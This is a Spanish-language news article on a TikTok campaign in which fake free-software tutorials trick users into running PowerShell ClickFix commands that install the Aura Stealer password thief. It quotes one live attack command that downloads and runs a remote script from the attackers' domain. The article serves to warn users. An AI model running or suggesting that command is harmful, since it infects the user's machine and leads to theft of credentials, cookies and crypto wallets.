Una campaña en TikTok difunde supuestas guías para obtener software gratis que realmente instalan malware y roban contraseñas mediante ataques ClickFix.
Una reciente campaña de ciberdelincuentes utiliza TikTok como plataforma para difundir vídeos que fingen ofrecer métodos gratuitos para acceder a software y servicios de pago, como Windows, Photoshop o Netflix. Estos tutoriales, en apariencia inofensivos, esconden ataques conocidos como ClickFix, diseñados para distribuir malware y robar información personal, incluidas contraseñas. Según advirtió el SANS Internet Storm Center (ISC), los atacantes están aprovechando la enorme visibilidad de TikTok para diseminar campañas de ingeniería social disfrazadas de ayudas técnicas.
➡️ Te puede interesar: Máster Profesional en Ciberseguridad, Ciberinteligencia y Ciberdefensa
Los ciberdelincuentes han convertido la red de vídeos cortos de ByteDance en un espacio ideal para enganchar a las víctimas. A través de guías que prometen activar software o servicios premium de forma gratuita, logran atraer a usuarios de todas las edades. Los vídeos instruyen paso a paso sobre cómo ejecutar supuestos procesos técnicos para desbloquear funciones restringidas o versiones completas. Sin embargo, en realidad manipulan a los usuarios para que ejecuten código malicioso.
Tácticas de ingeniería social
Según los hallazgos del ISC, los ataques ClickFix emplean ventanas emergentes o instrucciones visuales que imitan herramientas de soporte técnico. Su objetivo es convencer a las víctimas de seguir indicaciones que culminan en la ejecución de un script malicioso en PowerShell, donde el usuario cree que está solucionando un problema o accediendo a una función gratuita, cuando en realidad está cediendo el control de su dispositivo.
➡️ Te puede interesar: Curso de Concienciación en Ciberseguridad
Bleeping Computer verificó que los vídeos incluyen comandos cortos, como [iex (irm slmgr.win/photoshop)], que los usuarios deben copiar y ejecutar como administradores. Este código conecta con servidores remotos desde los que se descargan otros scripts de PowerShell. Detrás de ese proceso, se ocultan dos ejecutables que se instalan sin el consentimiento del usuario, uno de ellos identificado como una variante del ladrón de información Aura Stealer.
Control del dispositivo
El malware Aura Stealer se centra en extraer credenciales de inicio de sesión, cookies de autenticación y carteras de criptomonedas almacenadas en el dispositivo. De forma paralela, un segundo ejecutable es capaz de compilar código bajo demanda, aunque se desconoce su función concreta. Los investigadores sospechan que podría servir para ampliar las capacidades del ataque o mantener el acceso persistente al sistema comprometido.
➡️ Te puede interesar: Curso de Prevención y Gestión de Ciberriesgos y Ciberataques
Como consecuencia de esta operación, los expertos alertan de que cualquier usuario que haya seguido las instrucciones de estos vídeos en TikTok ha visto comprometidas sus contraseñas. Además, los expertos alertan en que no existen métodos legítimos para obtener software de pago sin licencia. Del mismo modo, Bleeping Computer ha recordado que la ejecución de comandos desconocidos desde fuentes no verificadas puede derivar en la pérdida total de datos y violaciones graves de seguridad.
